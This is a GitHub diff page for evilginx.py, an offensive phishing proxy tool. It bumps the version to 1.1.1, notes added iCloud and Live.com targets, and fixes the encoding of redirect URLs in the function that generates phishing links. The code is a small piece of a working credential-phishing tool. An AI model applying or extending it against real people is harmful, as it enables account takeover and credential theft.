Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 3 additions & 0 deletions CHANGELOG
Original file line number Diff line number Diff line change
@@ -1,3 +1,6 @@
version 1.1.1 (beta):
[+] Fixed base64 encoding issue of redirection URLs that broke redirection if URL contained special characters, such as '?'.

version 1.1.0 (2017-06-01):
[+] Added iCloud.com support.
[+] Added Live.com support.
Expand Down
6 changes: 3 additions & 3 deletions evilginx.py
Original file line number Diff line number Diff line change
Expand Up @@ -28,7 +28,7 @@
import subprocess
import base64

VERSION = 'v.1.1.0'
VERSION = 'v.1.1.1'

EOL = '\n'
TAB = '\t'
Expand Down Expand Up @@ -673,8 +673,8 @@ def genurl_main(args):
if phish_path[0] != '/': phish_path = '/' + phish_path
gen_url = url + phish_path
if args.redirect != '':
b64redir = base64.urlsafe_b64encode(args.redirect).replace('=','')
gen_url += '?' + cfg.get('site','redir_arg') + '=0' + b64redir
b64redir = base64.b64encode(args.redirect)
gen_url += '?' + cfg.get('site','redir_arg') + '=0' + urllib.quote(b64redir)
print ' : ' + gen_url

else:
Expand Down